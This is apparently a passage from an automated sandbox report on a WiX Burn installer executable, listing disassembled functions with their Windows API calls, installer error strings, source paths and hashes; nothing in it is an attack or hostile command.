                                                                                                                                                          • Opcode Fuzzy Hash: bc27e21bed054997a685aacdfef09e9d6963caa88466dac64bd5853b373689fb
                                                                                                                                                          • Instruction Fuzzy Hash: 0581B571A40716BADB119B61CD45FEFB6B8AF04700F10423FF545F62C1EB78A9508BA8
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to copy install arguments for update bundle package, xrefs: 00450712
                                                                                                                                                          • Failed to allocate space for burn payload group inside of update bundle struct, xrefs: 0045047F
                                                                                                                                                          • Failed to copy download source for pseudo bundle., xrefs: 00450597
                                                                                                                                                          • Failed to copy key for pseudo bundle payload., xrefs: 0045050B
                                                                                                                                                          • Failed to copy id for update bundle., xrefs: 0045069C
                                                                                                                                                          • Failed to copy filename for pseudo bundle., xrefs: 00450536
                                                                                                                                                          • ~~C, xrefs: 00450447
                                                                                                                                                          • WixBundleRollbackLog_%ls, xrefs: 004506EE
                                                                                                                                                          • Failed to allocate space for burn payload inside of update bundle struct, xrefs: 004504C3
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\pseudobundle.cpp, xrefs: 0045046C, 00450477, 00450491, 004504B0, 004504BB, 004505F3, 0045061E, 00450629, 00450724
                                                                                                                                                          • WixBundleLog_%ls, xrefs: 004506DE
                                                                                                                                                          • Failed to decode hash string: %ls., xrefs: 004505E1
                                                                                                                                                          • Failed to allocate memory for update bundle payload hash., xrefs: 00450631
                                                                                                                                                          • Failed to copy cache id for update bundle., xrefs: 004506C5
                                                                                                                                                          • Failed to copy local source path for pseudo bundle., xrefs: 00450561
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                          • String ID: Failed to allocate memory for update bundle payload hash.$Failed to allocate space for burn payload group inside of update bundle struct$Failed to allocate space for burn payload inside of update bundle struct$Failed to copy cache id for update bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy id for update bundle.$Failed to copy install arguments for update bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy local source path for pseudo bundle.$Failed to decode hash string: %ls.$WixBundleLog_%ls$WixBundleRollbackLog_%ls$d:\a\wix\wix\src\burn\engine\pseudobundle.cpp$~~C
                                                                                                                                                          • API String ID: 1617791916-45883921
                                                                                                                                                          • Opcode ID: 9f39873dbb578f99873fe75b4d3e44a57bf282c66b5616a4717f786d1efb4d9f
                                                                                                                                                          • Instruction ID: a644be3552a4b52e5a90bb878c1ed40511a6c5afffe57aa46d8515e10df4a51a
                                                                                                                                                          • Opcode Fuzzy Hash: 9f39873dbb578f99873fe75b4d3e44a57bf282c66b5616a4717f786d1efb4d9f
                                                                                                                                                          • Instruction Fuzzy Hash: D6710C71B40315BBDB219E558C46F9B7E58AB04B15F11013BBD08FB2C1E3F8E9548B98
                                                                                                                                                          APIs
                                                                                                                                                          • GetTempFileNameW.KERNEL32(00000000,000000F6,00000001,00000000,00000000,00000104,00000000,7FFFFFFF,?,d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dirutil.cpp,00000000,00000001), ref: 00406BD4
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00406BE2
                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000005,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,?,d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dirutil.cpp,00000000,00000001), ref: 00406C7A
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00406C87
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLast$CreateNameTemp
                                                                                                                                                          • String ID: %ls%x.TMP$Failed to allocate buffer for GetTempFileNameW.$Failed to allocate memory for file template.$Failed to allocate temp file name.$Failed to copy temp file string.$Failed to create file: %ls$Failed to create new temp file name.$Failed to create temp file.$Failed to get length of path to prefix.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dirutil.cpp$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
                                                                                                                                                          • API String ID: 2316751675-3180914264
                                                                                                                                                          • Opcode ID: ede8294ed054f4eaa16b559dd93b741b44d87aeeef134c6b671cb6e270799138
                                                                                                                                                          • Instruction ID: 9a6d470e8976dd33999de4de615c16fdd4d54d37620609bca355d59fe9579ad6
                                                                                                                                                          • Opcode Fuzzy Hash: ede8294ed054f4eaa16b559dd93b741b44d87aeeef134c6b671cb6e270799138
                                                                                                                                                          • Instruction Fuzzy Hash: 21513B31B4032576EB312A558C0EFAF3A68DF01B34F52427BBE19BA1D1E27C4D20969D
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,00000001,?,?,0043B8B7,0044CCA9,8000FFFF,000000B0,?,00000000,00000000,00000008,?,8000FFFF,?), ref: 00450956
                                                                                                                                                          • GetProcessId.KERNEL32(?,00000000,00000008,00000001,08000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000004,00000000), ref: 00450A7D
                                                                                                                                                            • Part of subcall function 0041B39D: lstrlenW.KERNEL32(64681479,00000000,00000000,00000004,?,?,?,?,?,?,?,00450A96,00000000,?,?,00000000), ref: 0041B3D1
                                                                                                                                                            • Part of subcall function 0041B39D: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00450A96,00000000,?,?,00000000,00000000,00000000,00000004,00000000), ref: 0041B3DC
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,000000FF,0043B8B7,?,004508A0,8000FFFF,?,00000000,?,?,00000000,00000000,00000000,00000004,00000000), ref: 00450B1A
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,000000FF,0043B8B7,?,004508A0,8000FFFF,?,00000000,?,?,00000000,00000000,00000000,00000004,00000000), ref: 00450B2D
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to append embedded args., xrefs: 004509FE
                                                                                                                                                          • burn.embedded, xrefs: 004509E2
                                                                                                                                                          • Failed to create embedded process at path: %ls, xrefs: 00450A66
                                                                                                                                                          • Failed to wait for embedded process to connect to pipe., xrefs: 00450A9C
                                                                                                                                                          • Failed to wait for embedded executable: %ls, xrefs: 00450AF5
                                                                                                                                                          • Failed to process messages from embedded message., xrefs: 00450ACB
                                                                                                                                                          • Failed to create embedded pipe., xrefs: 004509C7
                                                                                                                                                          • Failed to append user args., xrefs: 00450A2F
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\embedded.cpp, xrefs: 004509A7, 00450B04
                                                                                                                                                          • %ls -%ls %ls %ls %u, xrefs: 004509EA
                                                                                                                                                          • Failed to create embedded pipe name and client token., xrefs: 00450998
                                                                                                                                                          • %ls, xrefs: 00450A1B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$CloseCurrentHandle$lstrlen
                                                                                                                                                          • String ID: %ls$%ls -%ls %ls %ls %u$Failed to append embedded args.$Failed to append user args.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process at path: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$d:\a\wix\wix\src\burn\engine\embedded.cpp
                                                                                                                                                          • API String ID: 371141078-2178332678
                                                                                                                                                          • Opcode ID: 209e2bbf3152eb0d1b372ed1075cd12acb9cf1906df22ca69cc98f984c0f1094
                                                                                                                                                          • Instruction ID: 53bc25a49415031172dba7e4ca4f9f9b0de2ca42141443f131b599a5dc3bcff6
                                                                                                                                                          • Opcode Fuzzy Hash: 209e2bbf3152eb0d1b372ed1075cd12acb9cf1906df22ca69cc98f984c0f1094
                                                                                                                                                          • Instruction Fuzzy Hash: D651C535A80715BBDF129A94CC46FDE7E74AF04715F200127FE04B91D2D3B8A9548B9D
                                                                                                                                                          APIs
                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0042B94B
                                                                                                                                                          • RegisterClassW.USER32(?), ref: 0042B95F
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0042B96A
                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 0042B9E6
                                                                                                                                                          • IsDialogMessageW.USER32(?,?), ref: 0042B9FA
                                                                                                                                                          • TranslateMessage.USER32(?), ref: 0042BA08
                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 0042BA12
                                                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0042BA1F
                                                                                                                                                          • UnregisterClassW.USER32(WixBurnSplashScreen,?), ref: 0042BA57
                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0042BA66
                                                                                                                                                          • PostMessageW.USER32(00000000,00000010,00000000,00000000), ref: 0042BA79
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Message$Class$CursorDeleteDialogDispatchErrorEventLastLoadObjectPostRegisterTranslateUnregister
                                                                                                                                                          • String ID: Failed to load splash screen.$Failed to register window.$Unexpected return value from message pump.$WixBurnSplashScreen$d:\a\wix\wix\src\burn\engine\splashscreen.cpp
                                                                                                                                                          • API String ID: 1126262391-909264728
                                                                                                                                                          • Opcode ID: e283da046b6ac20e6b6f2048ff2ef2d82d6d0ddcef83d474a2dd279031ca4e02
                                                                                                                                                          • Instruction ID: 51c4dd155626f649d15f0ff0031e0e49bd55d296fbe602a6d4f54fb9c10163c8
                                                                                                                                                          • Opcode Fuzzy Hash: e283da046b6ac20e6b6f2048ff2ef2d82d6d0ddcef83d474a2dd279031ca4e02
                                                                                                                                                          • Instruction Fuzzy Hash: DD41A871A00329ABEB119B94DC49FAF7779FB04714F904027FA04B6290D7786C51DBE9
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,000004A0,00000120,00000000,?,?,?,?,?,00000000,00000000,00000000,00000120,000004A0,?,00000000), ref: 00412E8A
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to open registry key., xrefs: 00412CA3
                                                                                                                                                          • Unsupported registry key value type. Type = '%u', xrefs: 00412D66
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\search.cpp, xrefs: 00412D52, 00412D5D, 00412D78, 00412E4E
                                                                                                                                                          • Failed to query registry key value., xrefs: 00412D16
                                                                                                                                                          • Failed to read registry value., xrefs: 00412DED
                                                                                                                                                          • Failed to change value type., xrefs: 00412E13
                                                                                                                                                          • Failed to format value string., xrefs: 00412C4E
                                                                                                                                                          • Failed to format key string., xrefs: 00412C1C
                                                                                                                                                          • Registry key not found. Key = '%ls', xrefs: 00412CC1
                                                                                                                                                          • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 00412CFF
                                                                                                                                                          • Failed to set variable., xrefs: 00412E3C
                                                                                                                                                          • RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 00412E62
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: Failed to change value type.$Failed to format key string.$Failed to format value string.$Failed to open registry key.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$d:\a\wix\wix\src\burn\engine\search.cpp
                                                                                                                                                          • API String ID: 3535843008-3247734957
                                                                                                                                                          • Opcode ID: 12bd8c43e26c3d2d80f399d4e7a8911576fe1dff76ee46c7f9dd62b1de8dacb2
                                                                                                                                                          • Instruction ID: 6a3f590ba287f123ba5eb6c660a86e588a3463e90b215b76a7f7c5b5a3178aec
                                                                                                                                                          • Opcode Fuzzy Hash: 12bd8c43e26c3d2d80f399d4e7a8911576fe1dff76ee46c7f9dd62b1de8dacb2
                                                                                                                                                          • Instruction Fuzzy Hash: F281F771E4021ABBDB129A91CD46FEFBA39AF08704F100127F604F61D0E3B999A09799
                                                                                                                                                          APIs
                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,?,?,00437E7E,?,00000000,?,00000000,00000000,?), ref: 0044FB19
                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,00437E7E,?,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0044FB85
                                                                                                                                                          • UuidCreate.RPCRT4(00000000), ref: 0044FBE0
                                                                                                                                                          • StringFromGUID2.OLE32(00000000,?,00000027,?,?,?,?,?,00437E7E,?,00000000,?,00000000,00000000,?,?), ref: 0044FC0E
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00437E7E,?,00000000,?,00000000,00000000,?,?,00000000), ref: 0044FCEC
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$CreateEnterFromLeaveStringUuidlstrlen
                                                                                                                                                          • String ID: %ls\%ls$Engine is active, cannot change engine state.$Failed to build bundle update file path.$Failed to convert bundle update guid into string.$Failed to create bundle update guid.$Failed to create command-line for update bundle.$Failed to set update bundle.$d:\a\wix\wix\src\burn\engine\externalengine.cpp$~~C$~~C
                                                                                                                                                          • API String ID: 1974238189-1261730144
                                                                                                                                                          • Opcode ID: 03f5b560b0e41b490184b3bdf92d975ef718fade531225520f45196dc2e5a06e
                                                                                                                                                          • Instruction ID: 76d9bde9d56a6a3542f3f286c5160536a990d8c7c614d1e0ed2ac3a64bda58fd
                                                                                                                                                          • Opcode Fuzzy Hash: 03f5b560b0e41b490184b3bdf92d975ef718fade531225520f45196dc2e5a06e
                                                                                                                                                          • Instruction Fuzzy Hash: 05618431E40319ABEF21DAA1CC45F9F77B8EB05704F14413BF905EB291E678A948CB98
                                                                                                                                                          APIs
                                                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,00000000,?,?,?,?,?,?,?,?,?,004449C3,?), ref: 004443E5
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004449C3,?,?,?), ref: 004443F4
                                                                                                                                                          • OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,004449C3,?,?,?), ref: 0044444E
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004449C3,?,?,?), ref: 0044445A
                                                                                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,004449C3,?,?,?), ref: 004444A2
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004449C3,?,?,?), ref: 004444AC
                                                                                                                                                            • Part of subcall function 004445B2: ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00444551,00000000,00000003), ref: 004445C9
                                                                                                                                                            • Part of subcall function 004445B2: GetLastError.KERNEL32(?,00444551,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,004449C3,?), ref: 004445D3
                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 0044458E
                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 00444599
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Service$ErrorLast$CloseHandleOpen$ChangeConfigManagerQueryStatus
                                                                                                                                                          • String ID: Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$d:\a\wix\wix\src\burn\engine\msuengine.cpp$wuauserv
                                                                                                                                                          • API String ID: 2017831661-2683244120
                                                                                                                                                          • Opcode ID: 748bab543414944ad4ab47874563405ef71a4a1d197366f364fe9476595efdfb
                                                                                                                                                          • Instruction ID: 63597a68b73f4120795fd45a560b3b74a0674a4ac04394bda1ca117a8d697a03
                                                                                                                                                          • Opcode Fuzzy Hash: 748bab543414944ad4ab47874563405ef71a4a1d197366f364fe9476595efdfb
                                                                                                                                                          • Instruction Fuzzy Hash: 0951C836E4032477E7219A649C46FAF7AA4AB85B54F11413AFE04BB382D77C9C4186EC
                                                                                                                                                          APIs
                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,?), ref: 0040642D
                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000001,?,?,?), ref: 0040643C
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?), ref: 00406446
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?), ref: 0040648B
                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000105,?,?,?), ref: 004064CB
                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,?,?,?,?), ref: 004064D9
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?), ref: 004064E7
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?), ref: 00406576
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$FileModuleName
                                                                                                                                                          • String ID: Failed to allocate space for module path.$Failed to get max length of input buffer.$Failed to get path for executing process.$Failed to get size of path for executing process.$Failed to re-allocate more space for module path.$Unexpected failure getting path for executing process.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
                                                                                                                                                          • API String ID: 1026760046-1889348001
                                                                                                                                                          • Opcode ID: 4ca52385180dcaad019fa9073459385e82e8a0b58531bf08f5f04a0d0a71ed28
                                                                                                                                                          • Instruction ID: 2138d87be215f1ea1cc20fa625e0f4d1cd6fdd8d41726a79d599f7009da7d355
                                                                                                                                                          • Opcode Fuzzy Hash: 4ca52385180dcaad019fa9073459385e82e8a0b58531bf08f5f04a0d0a71ed28
                                                                                                                                                          • Instruction Fuzzy Hash: B7412672A4022077EB215A949C4DF6F6AA8DB04B14F538177FD0AFB2D1D23C8C5086AD
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
                                                                                                                                                            • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00474EFB
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00474F0A
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00474F19
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to allocate ATOM unknown element name., xrefs: 00474DB3
                                                                                                                                                          • Failed get attributes on ATOM unknown element., xrefs: 00474E2D
                                                                                                                                                          • Failed to get unknown element value., xrefs: 00474DD7
                                                                                                                                                          • Failed to get unknown element name., xrefs: 00474D8E
                                                                                                                                                          • Failed to allocate ATOM unknown element namespace., xrefs: 00474D3C
                                                                                                                                                          • Failed to allocate ATOM unknown element value., xrefs: 00474DFF
                                                                                                                                                          • Failed to enumerate all attributes on ATOM unknown element., xrefs: 00474EB2
                                                                                                                                                          • Failed to allocate unknown element., xrefs: 00474CF1
                                                                                                                                                          • Failed to parse attribute on ATOM unknown element., xrefs: 00474EC6
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 00474CE0, 00474CEB, 00474D00, 00474D4B
                                                                                                                                                          • Failed to get unknown element namespace., xrefs: 00474D5D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeString$Heap$AllocProcess
                                                                                                                                                          • String ID: Failed get attributes on ATOM unknown element.$Failed to allocate ATOM unknown element name.$Failed to allocate ATOM unknown element namespace.$Failed to allocate ATOM unknown element value.$Failed to allocate unknown element.$Failed to enumerate all attributes on ATOM unknown element.$Failed to get unknown element name.$Failed to get unknown element namespace.$Failed to get unknown element value.$Failed to parse attribute on ATOM unknown element.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp
                                                                                                                                                          • API String ID: 1440466813-2212259248
                                                                                                                                                          • Opcode ID: 9474b616f0d1c105437982d5d140579f43797b5451934d9943fed9d07d5ef24f
                                                                                                                                                          • Instruction ID: 9699fcafbd6da7079766b595e0108f5360dfc4e060ddffdfb6e3cc2d055a7cb8
                                                                                                                                                          • Opcode Fuzzy Hash: 9474b616f0d1c105437982d5d140579f43797b5451934d9943fed9d07d5ef24f
                                                                                                                                                          • Instruction Fuzzy Hash: AF81D331740615ABDB21CB54CC49FBE7769ABD1B18F10405AFA09BF2D0DBB89A01CB99
                                                                                                                                                          APIs
                                                                                                                                                          • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000200,00000000,?,00000044,?,?,?,?,?), ref: 0040FD7D
